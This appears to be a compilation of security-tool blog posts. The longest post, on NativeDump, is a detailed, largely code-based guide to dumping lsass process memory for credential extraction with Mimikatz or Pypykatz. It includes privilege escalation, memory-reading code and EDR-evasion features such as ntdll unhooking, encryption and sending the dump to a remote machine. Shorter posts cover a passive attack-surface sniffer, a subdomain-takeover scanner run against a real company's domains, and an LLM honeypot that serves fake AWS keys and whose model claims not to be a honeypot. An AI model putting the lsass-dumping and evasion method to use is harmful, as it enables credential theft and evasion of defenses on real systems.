NativeDump - Dump Lsass Using Only Native APIs By Hand-Crafting Minidump Files (Without MinidumpWriteDump!)

By: Zion3R


NativeDump dumps the lsass process using only NTAPIs, generating a Minidump file with only the streams needed for it to be parsed by tools like Mimikatz or Pypykatz (the SystemInfo, ModuleList and Memory64List streams).


  • NtOpenProcessToken and NtAdjustPrivilegesToken to enable the "SeDebugPrivilege" privilege
  • RtlGetVersion to get the operating system version details (major version, minor version and build number), needed for the SystemInfo stream
  • NtQueryInformationProcess and NtReadVirtualMemory to get the lsasrv.dll address, the only module needed for the ModuleList stream
  • NtOpenProcess to get a handle to the lsass process
  • NtQueryVirtualMemory and NtReadVirtualMemory to loop through the memory regions and dump all readable ones, populating the Memory64List stream at the same time

Usage:

NativeDump.exe [DUMP_FILE]

The default file name is "proc_.dmp".

The tool has been tested against Windows 10 and 11 devices with the most common security solutions (Microsoft Defender for Endpoint, CrowdStrike...) and is, for now, undetected. However, it does not work if PPL is enabled on the system.

Some benefits of this technique are:

  • It does not use the well-known dbghelp!MinidumpWriteDump function
  • It only uses functions from Ntdll.dll, so it is possible to bypass API hooking by remapping the library
  • The Minidump file does not have to be written to disk; you can transfer its bytes (encoded or encrypted) to a remote machine

The project has three branches at the moment (apart from the main branch with the basic technique):

  • ntdlloverwrite - Overwrite ntdll.dll's ".text" section using a clean version from the DLL file already on disk

  • delegates - Overwrite ntdll.dll + Dynamic function resolution + String encryption with AES + XOR-encoding

  • remote - Overwrite ntdll.dll + Dynamic function resolution + String encryption with AES + Send file to remote machine + XOR-encoding


Technique in detail: Creating a minimal Minidump file

After reading up on the undocumented Minidump structures, the file format can be summed up as:

  • Header: Information like the Signature ("MDMP"), the location of the Stream Directory and the number of streams
  • Stream Directory: One entry for each stream, containing the type, total size and location in the file of each one
  • Streams: Every stream contains different information related to the process and has its own format
  • Regions: The actual bytes of each readable memory region of the process

I created a parsing tool which can be helpful: MinidumpParser.

We will focus on creating a valid file with only the necessary values for the header, the stream directory and the three streams a Minidump file needs in order to be parsed by Mimikatz/Pypykatz: the SystemInfo, ModuleList and Memory64List streams.


A. Header

The header is a 32-byte structure which can be defined in C# as:

public struct MinidumpHeader
{
    public uint Signature;
    public ushort Version;
    public ushort ImplementationVersion;
    public ushort NumberOfStreams;
    public uint StreamDirectoryRva;
    public uint CheckSum;
    public IntPtr TimeDateStamp;
}

The required values are:

  • Signature: Fixed value 0x504D444D (the "MDMP" string)
  • Version: Fixed value 0xA793 (the Microsoft constant MINIDUMP_VERSION)
  • NumberOfStreams: Fixed value 3, the three streams required for the file
  • StreamDirectoryRva: Fixed value 0x20 (32 bytes), the size of the header
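As a quick illustration (the tool itself is C#), here is a minimal Python sketch of packing those 32 bytes with struct.pack, mirroring the field layout of the C# struct above, including the alignment padding that brings it to 32 bytes:

import struct

# Pack the 32-byte Minidump header (sketch). Layout mirrors the C# struct
# above: 4-byte signature, three 2-byte fields plus padding, two 4-byte
# fields plus padding, and an 8-byte timestamp slot.
MDMP_SIGNATURE = 0x504D444D        # "MDMP" in little-endian
MINIDUMP_VERSION = 0xA793
header = struct.pack(
    "<IHHHxxIIxxxxQ",
    MDMP_SIGNATURE,
    MINIDUMP_VERSION,
    0,       # ImplementationVersion
    3,       # NumberOfStreams
    0x20,    # StreamDirectoryRva: directory starts right after the header
    0,       # CheckSum (unused)
    0,       # TimeDateStamp (unused)
)
assert len(header) == 32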


B. Stream Directory

Each entry in the Stream Directory is a 12-byte structure, so with 3 entries the total size is 36 bytes. The C# struct definition for an entry is:

public struct MinidumpStreamDirectoryEntry
{
    public uint StreamType;
    public uint Size;
    public uint Location;
}

The field "StreamType" represents the type of stream as an integer or ID, some of the most relevant are:

ID Stream Type
0x00 UnusedStream
0x01 ReservedStream0
0x02 ReservedStream1
0x03 ThreadListStream
0x04 ModuleListStream
0x05 MemoryListStream
0x06 ExceptionStream
0x07 SystemInfoStream
0x08 ThreadExListStream
0x09 Memory64ListStream
0x0A CommentStreamA
0x0B CommentStreamW
0x0C HandleDataStream
0x0D FunctionTableStream
0x0E UnloadedModuleListStream
0x0F MiscInfoStream
0x10 MemoryInfoListStream
0x11 ThreadInfoListStream
0x12 HandleOperationListStream
0x13 TokenStream
0x16 ProcessVmCountersStream
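A hedged Python sketch of packing the three directory entries (the fixed sizes and offsets are the ones used throughout this article; the Memory64List size is only known after walking memory):

import struct

# Each 12-byte entry: StreamType, Size, Location (file offset).
def directory_entry(stream_type: int, size: int, location: int) -> bytes:
    return struct.pack("<III", stream_type, size, location)

number_of_regions = 100                        # placeholder, known after the memory walk
memory64_size = 16 + 16 * number_of_regions    # assumes an 8-byte count plus an 8-byte base RVA

stream_directory = (
    directory_entry(0x07, 56, 0x44)                 # SystemInfoStream
    + directory_entry(0x04, 112, 0x7C)              # ModuleListStream
    + directory_entry(0x09, memory64_size, 0x12A)   # Memory64ListStream
)
assert len(stream_directory) == 36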

C. SystemInformation Stream

The first stream is the SystemInfo stream, with ID 7. Its size is 56 bytes and it is located at offset 68 (0x44), right after the Stream Directory. Its C# definition is:

public struct SystemInformationStream
{
    public ushort ProcessorArchitecture;
    public ushort ProcessorLevel;
    public ushort ProcessorRevision;
    public byte NumberOfProcessors;
    public byte ProductType;
    public uint MajorVersion;
    public uint MinorVersion;
    public uint BuildNumber;
    public uint PlatformId;
    public uint UnknownField1;
    public uint UnknownField2;
    public IntPtr ProcessorFeatures;
    public IntPtr ProcessorFeatures2;
    public uint UnknownField3;
    public ushort UnknownField14;
    public byte UnknownField15;
}

The required values are:

  • ProcessorArchitecture: 9 for 64-bit and 0 for 32-bit Windows systems
  • MajorVersion, MinorVersion and BuildNumber: Hardcoded or obtained through kernel32!GetVersionEx or ntdll!RtlGetVersion (we will use the latter)
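If you want to reproduce the version lookup outside C#, RtlGetVersion is straightforward to call from Python via ctypes (Windows only; the structure below is the documented RTL_OSVERSIONINFOW):

import ctypes
from ctypes import wintypes

# Query the OS version via ntdll!RtlGetVersion, which is not affected by
# the compatibility shims that can skew kernel32!GetVersionEx.
class RTL_OSVERSIONINFOW(ctypes.Structure):
    _fields_ = [
        ("dwOSVersionInfoSize", wintypes.DWORD),
        ("dwMajorVersion", wintypes.DWORD),
        ("dwMinorVersion", wintypes.DWORD),
        ("dwBuildNumber", wintypes.DWORD),
        ("dwPlatformId", wintypes.DWORD),
        ("szCSDVersion", wintypes.WCHAR * 128),
    ]

info = RTL_OSVERSIONINFOW()
info.dwOSVersionInfoSize = ctypes.sizeof(info)
ctypes.WinDLL("ntdll").RtlGetVersion(ctypes.byref(info))
print(info.dwMajorVersion, info.dwMinorVersion, info.dwBuildNumber)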


D. ModuleList Stream

The second stream is the ModuleList stream, with ID 4. It is located at offset 124 (0x7C), after the SystemInfo stream, and it also has a fixed size, 112 bytes, since it holds the entry of a single module, the only one needed for parsing to succeed: lsasrv.dll.

The typical structure for this stream is a 4-byte value containing the number of entries followed by 108-byte entries for each module:

public struct ModuleListStream
{
    public uint NumberOfModules;
    public ModuleInfo[] Modules;
}

As there is only one module, it can be simplified to:

public struct ModuleListStream
{
    public uint NumberOfModules;
    public IntPtr BaseAddress;
    public uint Size;
    public uint UnknownField1;
    public uint Timestamp;
    public uint PointerName;
    public IntPtr UnknownField2;
    public IntPtr UnknownField3;
    public IntPtr UnknownField4;
    public IntPtr UnknownField5;
    public IntPtr UnknownField6;
    public IntPtr UnknownField7;
    public IntPtr UnknownField8;
    public IntPtr UnknownField9;
    public IntPtr UnknownField10;
    public IntPtr UnknownField11;
}

The required values are:

  • NumberOfModules: Fixed value 1
  • BaseAddress: Using psapi!GetModuleBaseName or a combination of ntdll!NtQueryInformationProcess and ntdll!NtReadVirtualMemory (we will use the latter)
  • Size: Obtained by adding up all memory region sizes starting at BaseAddress until reaching one with a size of 4096 bytes (0x1000), the .text section of another library
  • PointerName: A Unicode string structure for the "C:\Windows\System32\lsasrv.dll" string, located right after the stream itself at offset 236 (0xEC)
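The string that PointerName points to is stored as a 4-byte character-byte count followed by the UTF-16LE characters. A small Python sketch of building that blob (hedged: some Minidump writers also append a null terminator):

import struct

# Module-name blob placed right after the ModuleList stream at offset 0xEC:
# a 4-byte length (in bytes, excluding any terminator) plus UTF-16LE chars.
path = "C:\\Windows\\System32\\lsasrv.dll"
chars = path.encode("utf-16-le")
module_name_blob = struct.pack("<I", len(chars)) + chars
POINTER_NAME_RVA = 0xEC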


E. Memory64List Stream

The third stream is the Memory64List stream, with ID 9. It is located at offset 298 (0x12A), after the ModuleList stream and the Unicode string, and its size depends on the number of memory regions.

public struct Memory64ListStream
{
    public ulong NumberOfEntries;
    public uint MemoryRegionsBaseAddress;
    public Memory64Info[] MemoryInfoEntries;
}

Each memory region entry is a 16-byte structure:

public struct Memory64Info
{
    public IntPtr Address;
    public IntPtr Size;
}

The required values are:

  • NumberOfEntries: The number of memory regions, obtained after looping through them
  • MemoryRegionsBaseAddress: The file offset where the raw memory region bytes begin, calculated by adding the size of all 16-byte memory entries to the start of the stream
  • Address and Size: Obtained for each valid region while looping
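A hedged Python sketch of serializing this stream (the base-RVA math assumes the documented MINIDUMP_MEMORY64_LIST layout with an 8-byte count and an 8-byte base RVA; the region values here are invented for illustration):

import struct

STREAM_OFFSET = 0x12A
regions = [(0x7FFE0000, 0x1000), (0x1A2B3C0000, 0x5000)]   # (address, size) placeholders

# Raw region bytes are laid out back-to-back right after the stream itself.
base_rva = STREAM_OFFSET + 8 + 8 + 16 * len(regions)
memory64_stream = (
    struct.pack("<Q", len(regions))        # NumberOfEntries
    + struct.pack("<Q", base_rva)          # where the raw bytes start
    + b"".join(struct.pack("<QQ", addr, size) for addr, size in regions)
)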


F. Looping memory regions

There are some prerequisites for looping through the memory regions of the lsass.exe process, all of which can be met using only NTAPIs:

  1. Obtain the "SeDebugPrivilege" privilege. Instead of the typical advapi32!OpenProcessToken, advapi32!LookupPrivilegeValue and advapi32!AdjustTokenPrivileges, we will use ntdll!NtOpenProcessToken, ntdll!NtAdjustPrivilegesToken and the hardcoded value of 20 for the LUID (which is constant across all recent Windows versions)
  2. Obtain the process ID. For example, loop over all processes using ntdll!NtGetNextProcess, obtain the PEB address with ntdll!NtQueryInformationProcess and use ntdll!NtReadVirtualMemory to read the ImagePathName field inside ProcessParameters. To avoid overcomplicating the PoC, we will use .NET's Process.GetProcessesByName()
  3. Open a process handle. Use ntdll!NtOpenProcess with the access rights PROCESS_QUERY_INFORMATION (0x0400) to retrieve process information and PROCESS_VM_READ (0x0010) to read the memory bytes

With this it is possible to traverse the process memory:

  • ntdll!NtQueryVirtualMemory: Returns a MEMORY_BASIC_INFORMATION structure with the protection type, state, base address and size of each memory region
  • If the memory protection is not PAGE_NOACCESS (0x01) and the memory state is MEM_COMMIT (0x1000), meaning the region is accessible and committed, its base address and size populate one entry of the Memory64List stream and its bytes can be appended to the file
  • If the base address equals the lsasrv.dll base address, it is used to calculate the size of lsasrv.dll in memory
  • ntdll!NtReadVirtualMemory: Adds the bytes of that region to the Minidump file after the Memory64List stream
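For illustration, the same walk can be sketched in Python with ctypes (Windows only; handle is assumed to be an lsass handle already opened with PROCESS_QUERY_INFORMATION | PROCESS_VM_READ, and information class 0 is MemoryBasicInformation):

import ctypes
from ctypes import wintypes

ntdll = ctypes.WinDLL("ntdll")

class MEMORY_BASIC_INFORMATION(ctypes.Structure):
    _fields_ = [
        ("BaseAddress", ctypes.c_void_p),
        ("AllocationBase", ctypes.c_void_p),
        ("AllocationProtect", wintypes.DWORD),
        ("PartitionId", wintypes.WORD),
        ("RegionSize", ctypes.c_size_t),
        ("State", wintypes.DWORD),
        ("Protect", wintypes.DWORD),
        ("Type", wintypes.DWORD),
    ]

ntdll.NtQueryVirtualMemory.argtypes = [
    wintypes.HANDLE, ctypes.c_void_p, ctypes.c_uint,
    ctypes.POINTER(MEMORY_BASIC_INFORMATION), ctypes.c_size_t,
    ctypes.POINTER(ctypes.c_size_t)]
ntdll.NtReadVirtualMemory.argtypes = [
    wintypes.HANDLE, ctypes.c_void_p, ctypes.c_void_p,
    ctypes.c_size_t, ctypes.POINTER(ctypes.c_size_t)]

MEM_COMMIT, PAGE_NOACCESS = 0x1000, 0x01

def walk_regions(handle):
    """Collect (address, size, bytes) for every readable committed region."""
    regions, address = [], 0
    mbi, ret = MEMORY_BASIC_INFORMATION(), ctypes.c_size_t()
    while ntdll.NtQueryVirtualMemory(handle, address, 0, ctypes.byref(mbi),
                                     ctypes.sizeof(mbi), ctypes.byref(ret)) == 0:
        if mbi.State == MEM_COMMIT and mbi.Protect != PAGE_NOACCESS:
            buf = ctypes.create_string_buffer(mbi.RegionSize)
            done = ctypes.c_size_t()
            if ntdll.NtReadVirtualMemory(handle, mbi.BaseAddress, buf,
                                         mbi.RegionSize, ctypes.byref(done)) == 0:
                regions.append((address, mbi.RegionSize, buf.raw[:done.value]))
        address = (mbi.BaseAddress or 0) + mbi.RegionSize
    return regions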


G. Creating Minidump file

After the previous steps we have everything necessary to create the Minidump file. We can create the file locally or send the bytes to a remote machine, optionally encoding or encrypting them first. Some of these possibilities are coded in the delegates branch, where the file created locally can be XOR-encoded, and in the remote branch, where the file can be XOR-encoded before being sent to a remote machine.




Above - Invisible Network Protocol Sniffer

By: Zion3R


Invisible protocol sniffer for finding vulnerabilities in the network. Designed for pentesters and security engineers.


Above: Invisible network protocol sniffer
Designed for pentesters and security engineers

Author: Magama Bazarov, <caster@exploit.org>
Pseudonym: Caster
Version: 2.6
Codename: Introvert

Disclaimer

All information contained in this repository is provided for educational and research purposes only. The author is not responsible for any illegal use of this tool.

It is a specialized network security tool that helps both pentesters and security professionals.

Mechanics

Above is an invisible network sniffer for finding vulnerabilities in network equipment. It is based entirely on passive network traffic analysis, so it makes no noise on the air. It is built completely on the Scapy library.

Above allows pentesters to automate the process of finding vulnerabilities in network hardware: discovery protocols, dynamic routing, 802.1Q, ICS protocols, FHRP, STP, LLMNR/NBT-NS, and more.

Supported protocols

Detects up to 27 protocols:

MACSec (802.1X AE)
EAPOL (Checking 802.1X versions)
ARP (Passive ARP, Host Discovery)
CDP (Cisco Discovery Protocol)
DTP (Dynamic Trunking Protocol)
LLDP (Link Layer Discovery Protocol)
802.1Q Tags (VLAN)
S7COMM (Siemens)
OMRON
TACACS+ (Terminal Access Controller Access Control System Plus)
ModbusTCP
STP (Spanning Tree Protocol)
OSPF (Open Shortest Path First)
EIGRP (Enhanced Interior Gateway Routing Protocol)
BGP (Border Gateway Protocol)
VRRP (Virtual Router Redundancy Protocol)
HSRP (Hot Standby Router Protocol)
GLBP (Gateway Load Balancing Protocol)
IGMP (Internet Group Management Protocol)
LLMNR (Link Local Multicast Name Resolution)
NBT-NS (NetBIOS Name Service)
MDNS (Multicast DNS)
DHCP (Dynamic Host Configuration Protocol)
DHCPv6 (Dynamic Host Configuration Protocol v6)
ICMPv6 (Internet Control Message Protocol v6)
SSDP (Simple Service Discovery Protocol)
MNDP (MikroTik Neighbor Discovery Protocol)

Operating Mechanism

Above works in two modes:

  • Hot mode: Sniffing on your interface specifying a timer
  • Cold mode: Analyzing traffic dumps

The tool is very simple in its operation and is driven by arguments:

  • Interface: Specifying the network interface on which sniffing will be performed
  • Timer: Time during which traffic analysis will be performed
  • Input: The tool takes an already prepared .pcap as input and looks for protocols in it
  • Output: Above will record the captured traffic to a .pcap file with a name you specify
  • Passive ARP: Detecting hosts in a segment using passive ARP

usage: above.py [-h] [--interface INTERFACE] [--timer TIMER] [--output OUTPUT] [--input INPUT] [--passive-arp]

options:
-h, --help show this help message and exit
--interface INTERFACE
Interface for traffic listening
--timer TIMER Time in seconds to capture packets, if not set capture runs indefinitely
--output OUTPUT File name where the traffic will be recorded
--input INPUT File name of the traffic dump
--passive-arp Passive ARP (Host Discovery)

Information about protocols

The information obtained will be useful not only to the pentester but also to the security engineer, who will know what to pay attention to.

When Above detects a protocol, it outputs the necessary information to indicate the attack vector or security issue:

  • Impact: What kind of attack can be performed on this protocol

  • Tools: What tool can be used to launch an attack

  • Technical information: Information the pentester needs: sender MAC/IP addresses, FHRP group IDs, OSPF/EIGRP domains, etc.

  • Mitigation: Recommendations for fixing the security problems

  • Source/Destination Addresses: For protocols, Above displays information about the source and destination MAC and IP addresses


Installation

Linux

You can install Above directly from the Kali Linux repositories

caster@kali:~$ sudo apt update && sudo apt install above

Or...

caster@kali:~$ sudo apt-get install python3-scapy python3-colorama python3-setuptools
caster@kali:~$ git clone https://github.com/casterbyte/Above
caster@kali:~$ cd Above/
caster@kali:~/Above$ sudo python3 setup.py install

macOS:

# Install python3 first
brew install python3
# Then install required dependencies
sudo pip3 install scapy colorama setuptools

# Clone the repo
git clone https://github.com/casterbyte/Above
cd Above/
sudo python3 setup.py install

Don't forget to deactivate your firewall on macOS!

Settings > Network > Firewall


How to Use

Hot mode

Above requires root access for sniffing

Above can be run with or without a timer:

caster@kali:~$ sudo above --interface eth0 --timer 120

To stop traffic sniffing, press CTRL + C

WARNING! Above is not designed to work with tunnel interfaces (L3) due to its use of filters for L2 protocols, so it may not work properly on tunneled L3 interfaces.

Example:

caster@kali:~$ sudo above --interface eth0 --timer 120

-----------------------------------------------------------------------------------------
[+] Start sniffing...

[*] After the protocol is detected - all necessary information about it will be displayed
--------------------------------------------------
[+] Detected SSDP Packet
[*] Attack Impact: Potential for UPnP Device Exploitation
[*] Tools: evil-ssdp
[*] SSDP Source IP: 192.168.0.251
[*] SSDP Source MAC: 02:10:de:64:f2:34
[*] Mitigation: Ensure UPnP is disabled on all devices unless absolutely necessary, monitor UPnP traffic
--------------------------------------------------
[+] Detected MDNS Packet
[*] Attack Impact: MDNS Spoofing, Credentials Interception
[*] Tools: Responder
[*] MDNS Spoofing works specifically against Windows machines
[*] You cannot get NetNTLMv2-SSP from Apple devices
[*] MDNS Speaker IP: fe80::183f:301c:27bd:543
[*] MDNS Speaker MAC: 02:10:de:64:f2:34
[*] Mitigation: Filter MDNS traffic. Be careful with MDNS filtering
--------------------------------------------------

If you need to record the sniffed traffic, use the --output argument

caster@kali:~$ sudo above --interface eth0 --timer 120 --output above.pcap

If you interrupt the tool with CTRL+C, the traffic is still written to the file

Cold mode

If you already have some recorded traffic, you can use the --input argument to look for potential security issues

caster@kali:~$ above --input ospf-md5.cap

Example:

caster@kali:~$ sudo above --input ospf-md5.cap

[+] Analyzing pcap file...

--------------------------------------------------
[+] Detected OSPF Packet
[+] Attack Impact: Subnets Discovery, Blackhole, Evil Twin
[*] Tools: Loki, Scapy, FRRouting
[*] OSPF Area ID: 0.0.0.0
[*] OSPF Neighbor IP: 10.0.0.1
[*] OSPF Neighbor MAC: 00:0c:29:dd:4c:54
[!] Authentication: MD5
[*] Tools for bruteforce: Ettercap, John the Ripper
[*] OSPF Key ID: 1
[*] Mitigation: Enable passive interfaces, use authentication
--------------------------------------------------
[+] Detected OSPF Packet
[+] Attack Impact: Subnets Discovery, Blackhole, Evil Twin
[*] Tools: Loki, Scapy, FRRouting
[*] OSPF Area ID: 0.0.0.0
[*] OSPF Neighbor IP: 192.168.0.2
[*] OSPF Neighbor MAC: 00:0c:29:43:7b:fb
[!] Authentication: MD5
[*] Tools for bruteforce: Ettercap, John the Ripper
[*] OSPF Key ID: 1
[*] Mitigation: Enable passive interfaces, use authentication

Passive ARP

The tool can detect hosts without making noise on the air by processing ARP frames in passive mode

caster@kali:~$ sudo above --interface eth0 --passive-arp --timer 10

[+] Host discovery using Passive ARP

--------------------------------------------------
[+] Detected ARP Reply
[*] ARP Reply for IP: 192.168.1.88
[*] MAC Address: 00:00:0c:07:ac:c8
--------------------------------------------------
[+] Detected ARP Reply
[*] ARP Reply for IP: 192.168.1.40
[*] MAC Address: 00:0c:29:c5:82:81
--------------------------------------------------
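Since Above is built entirely on Scapy, the core of the passive-ARP idea can be sketched in a few lines of Python (a minimal illustration, not Above's actual code; the interface name is an assumption):

from scapy.all import ARP, sniff

# Watch for ARP replies without ever transmitting a frame ourselves.
def on_packet(pkt):
    if ARP in pkt and pkt[ARP].op == 2:   # op 2 == "is-at" (reply)
        print(f"[+] {pkt[ARP].psrc} is at {pkt[ARP].hwsrc}")

sniff(iface="eth0", filter="arp", prn=on_packet, store=False)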

Outro

I wrote this tool because of the track "A View From Above (Remix)" by KOAN Sound. This track was everything to me when I was working on this sniffer.




Subhunter - A Fast Subdomain Takeover Tool

By: Zion3R


Subdomain takeover is a common vulnerability that allows an attacker to gain control over a subdomain of a target domain and redirect users intended for an organization's domain to a website that performs malicious activities, such as phishing campaigns, stealing user cookies, etc. Typically, this happens when the subdomain has a CNAME record in the DNS but no host is providing content for it. Subhunter takes a given list of subdomains and scans them to check for this vulnerability.
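Conceptually, the check Subhunter automates looks like the following Python sketch (Subhunter itself is written in Go; the fingerprint shown is illustrative only):

import dns.resolver   # pip install dnspython
import requests

# Resolve a subdomain's CNAME and look for a "service unclaimed" marker
# in the response body.
FINGERPRINTS = {"github.io": "There isn't a GitHub Pages site here"}

def looks_vulnerable(subdomain: str) -> bool:
    try:
        cname = dns.resolver.resolve(subdomain, "CNAME")[0].target.to_text()
        body = requests.get(f"http://{subdomain}", timeout=10).text
    except Exception:
        return False
    return any(service in cname and marker in body
               for service, marker in FINGERPRINTS.items())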


Features:

  • Auto update
  • Uses random user agents
  • Built in Go
  • Uses a fork of fingerprint data from well known sources (can-i-take-over-xyz)

Installation:

Option 1:

Download from releases

Option 2:

Build from source:

$ git clone https://github.com/Nemesis0U/Subhunter.git
$ go build subhunter.go

Usage:

Options:

Usage of subhunter:
-l string
File including a list of hosts to scan
-o string
File to save results
-t int
Number of threads for scanning (default 50)
-timeout int
Timeout in seconds (default 20)

Demo (Added fake fingerprint for POC):

./Subhunter -l subdomains.txt -o test.txt

____ _ _ _
/ ___| _ _ | |__ | |__ _ _ _ __ | |_ ___ _ __
\___ \ | | | | | '_ \ | '_ \ | | | | | '_ \ | __| / _ \ | '__|
___) | | |_| | | |_) | | | | | | |_| | | | | | | |_ | __/ | |
|____/ \__,_| |_.__/ |_| |_| \__,_| |_| |_| \__| \___| |_|


A fast subdomain takeover tool

Created by Nemesis

Loaded 88 fingerprints for current scan

-----------------------------------------------------------------------------

[+] Nothing found at www.ubereats.com: Not Vulnerable
[+] Nothing found at testauth.ubereats.com: Not Vulnerable
[+] Nothing found at apple-maps-app-clip.ubereats.com: Not Vulnerable
[+] Nothing found at about.ubereats.com: Not Vulnerable
[+] Nothing found at beta.ubereats.com: Not Vulnerable
[+] Nothing found at ewp.ubereats.com: Not Vulnerable
[+] Nothing found at edgetest.ubereats.com: Not Vulnerable
[+] Nothing found at guest.ubereats.com: Not Vulnerable
[+] Google Cloud: Possible takeover found at testauth.ubereats.com: Vulnerable
[+] Nothing found at info.ubereats.com: Not Vulnerable
[+] Nothing found at learn.ubereats.com: Not Vulnerable
[+] Nothing found at merchants.ubereats.com: Not Vulnerable
[+] Nothing found at guest-beta.ubereats.com: Not Vulnerable
[+] Nothing found at merchant-help.ubereats.com: Not Vulnerable
[+] Nothing found at merchants-beta.ubereats.com: Not Vulnerable
[+] Nothing found at merchants-staging.ubereats.com: Not Vulnerable
[+] Nothing found at messages.ubereats.com: Not Vulnerable
[+] Nothing found at order.ubereats.com: Not Vulnerable
[+] Nothing found at restaurants.ubereats.com: Not Vulnerable
[+] Nothing found at payments.ubereats.com: Not Vulnerable
[+] Nothing found at static.ubereats.com: Not Vulnerable

Subhunter exiting...
Results written to test.txt




Galah - An LLM-powered Web Honeypot Using The OpenAI API

By: Zion3R


TL;DR: Galah (/ɡəˈlɑː/ - pronounced 'guh-laa') is an LLM (Large Language Model) powered web honeypot, currently compatible with the OpenAI API, that is able to mimic various applications and dynamically respond to arbitrary HTTP requests.


Description

Named after the clever Australian parrot known for its mimicry, Galah mirrors this trait in its functionality. Unlike traditional web honeypots that rely on a manual and limiting method of emulating numerous web applications or vulnerabilities, Galah adopts a novel approach. This LLM-powered honeypot mimics various web applications by dynamically crafting relevant (and occasionally foolish) responses, including HTTP headers and body content, to arbitrary HTTP requests. Fun fact: in Aussie English, Galah also means fool!

I've deployed a cache for the LLM-generated responses (the cache duration can be customized in the config file) to avoid generating multiple responses for the same request and to reduce the cost of the OpenAI API. The cache stores responses per port, meaning if you probe a specific port of the honeypot, the generated response won't be returned for the same request on a different port.

The prompt is the most crucial part of this honeypot! You can update the prompt in the config file, but be sure not to change the part that instructs the LLM to generate the response in the specified JSON format.
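For reference, the contract is simple: the model must return a single JSON object with "Headers" and "Body" keys, as seen in the sample logs later in this post. A tiny Python illustration of the expected shape:

import json

raw = ('{"Headers": {"Content-Type": "text/html", "Server": "Apache/2.4.38"},'
       ' "Body": "<html>...</html>"}')
response = json.loads(raw)
headers, body = response["Headers"], response["Body"]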

Note: Galah was a fun weekend project I created to evaluate the capabilities of LLMs in generating HTTP messages, and it is not intended for production use. The honeypot may be fingerprinted based on its response time, non-standard, or sometimes weird responses, and other network-based techniques. Use this tool at your own risk, and be sure to set usage limits for your OpenAI API.

Future Enhancements

  • Rule-Based Response: The new version of Galah will employ a dynamic, rule-based approach, adding more control over response generation. This will further reduce OpenAI API costs and increase the accuracy of the generated responses.

  • Response Database: It will enable you to generate and import a response database. This ensures the honeypot only turns to the OpenAI API for unknown or new requests. I'm also working on cleaning up and sharing my own database.

  • Support for Other LLMs.

Getting Started

  • Ensure you have Go version 1.20+ installed.
  • Create an OpenAI API key from here.
  • If you want to serve over HTTPS, generate TLS certificates.
  • Clone the repo and install the dependencies.
  • Update the config.yaml file.
  • Build and run the Go binary!
% git clone git@github.com:0x4D31/galah.git
% cd galah
% go mod download
% go build
% ./galah -i en0 -v

██████ █████ ██ █████ ██ ██
██ ██ ██ ██ ██ ██ ██ ██
██ ███ ███████ ██ ███████ ███████
██ ██ ██ ██ ██ ██ ██ ██ ██
██████ ██ ██ ███████ ██ ██ ██ ██
llm-based web honeypot // version 1.0
author: Adel "0x4D31" Karimi

2024/01/01 04:29:10 Starting HTTP server on port 8080
2024/01/01 04:29:10 Starting HTTP server on port 8888
2024/01/01 04:29:10 Starting HTTPS server on port 8443 with TLS profile: profile1_selfsigned
2024/01/01 04:29:10 Starting HTTPS server on port 443 with TLS profile: profile1_selfsigned

2024/01/01 04:35:57 Received a request for "/.git/config" from [::1]:65434
2024/01/01 04:35:57 Request cache miss for "/.git/config": Not found in cache
2024/01/01 04:35:59 Generated HTTP response: {"Headers": {"Content-Type": "text/plain", "Server": "Apache/2.4.41 (Ubuntu)", "Status": "403 Forbidden"}, "Body": "Forbidden\nYou don't have permission to access this resource."}
2024/01/01 04:35:59 Sending the crafted response to [::1]:65434

^C2024/01/01 04:39:27 Received shutdown signal. Shutting down servers...
2024/01/01 04:39:27 All servers shut down gracefully.

Example Responses

Here are some example responses:

Example 1

% curl http://localhost:8080/login.php
<!DOCTYPE html><html><head><title>Login Page</title></head><body><form action='/submit.php' method='post'><label for='uname'><b>Username:</b></label><br><input type='text' placeholder='Enter Username' name='uname' required><br><label for='psw'><b>Password:</b></label><br><input type='password' placeholder='Enter Password' name='psw' required><br><button type='submit'>Login</button></form></body></html>

JSON log record:

{"timestamp":"2024-01-01T05:38:08.854878","srcIP":"::1","srcHost":"localhost","tags":null,"srcPort":"51978","sensorName":"home-sensor","port":"8080","httpRequest":{"method":"GET","protocolVersion":"HTTP/1.1","request":"/login.php","userAgent":"curl/7.71.1","headers":"User-Agent: [curl/7.71.1], Accept: [*/*]","headersSorted":"Accept,User-Agent","headersSortedSha256":"cf69e186169279bd51769f29d122b07f1f9b7e51bf119c340b66fbd2a1128bc9","body":"","bodySha256":"e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855"},"httpResponse":{"headers":{"Content-Type":"text/html","Server":"Apache/2.4.38"},"body":"\u003c!DOCTYPE html\u003e\u003chtml\u003e\u003chead\u003e\u003ctitle\u003eLogin Page\u003c/title\u003e\u003c/head\u003e\u003cbody\u003e\u003cform action='/submit.php' method='post'\u003e\u003clabel for='uname'\u003e\u003cb\u003eUsername:\u003c/b\u003e\u003c/label\u003e\u003cbr\u003e\u003cinput type='text' placeholder='Enter Username' name='uname' required\u003e\u003cbr\u003e\u003clabel for='psw'\u003e\u003cb\u003ePassword:\u003c/b\u003e\u003c/label\u003e\u003cbr\u003e\u003cinput type='password' placeholder='Enter Password' name='psw' required\u003e\u003cbr\u003e\u003cbutton type='submit'\u003eLogin\u003c/button\u003e\u003c/form\u003e\u003c/body\u003e\u003c/html\u003e"}}

Example 2

% curl http://localhost:8080/.aws/credentials
[default]
aws_access_key_id = AKIAIOSFODNN7EXAMPLE
aws_secret_access_key = wJalrXUtnFEMI/K7MDENG/bPxRfiCYEXAMPLEKEY
region = us-west-2

JSON log record:

{"timestamp":"2024-01-01T05:40:34.167361","srcIP":"::1","srcHost":"localhost","tags":null,"srcPort":"65311","sensorName":"home-sensor","port":"8080","httpRequest":{"method":"GET","protocolVersion":"HTTP/1.1","request":"/.aws/credentials","userAgent":"curl/7.71.1","headers":"User-Agent: [curl/7.71.1], Accept: [*/*]","headersSorted":"Accept,User-Agent","headersSortedSha256":"cf69e186169279bd51769f29d122b07f1f9b7e51bf119c340b66fbd2a1128bc9","body":"","bodySha256":"e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855"},"httpResponse":{"headers":{"Connection":"close","Content-Encoding":"gzip","Content-Length":"126","Content-Type":"text/plain","Server":"Apache/2.4.51 (Unix)"},"body":"[default]\naws_access_key_id = AKIAIOSFODNN7EXAMPLE\naws_secret_access_key = wJalrXUtnFEMI/K7MDENG/bPxRfiCYEXAMPLEKEY\nregion = us-west-2"}}

Okay, that was impressive!

Example 3

Now, let's do some sort of adversarial testing!

% curl http://localhost:8888/are-you-a-honeypot
No, I am a server.

JSON log record:

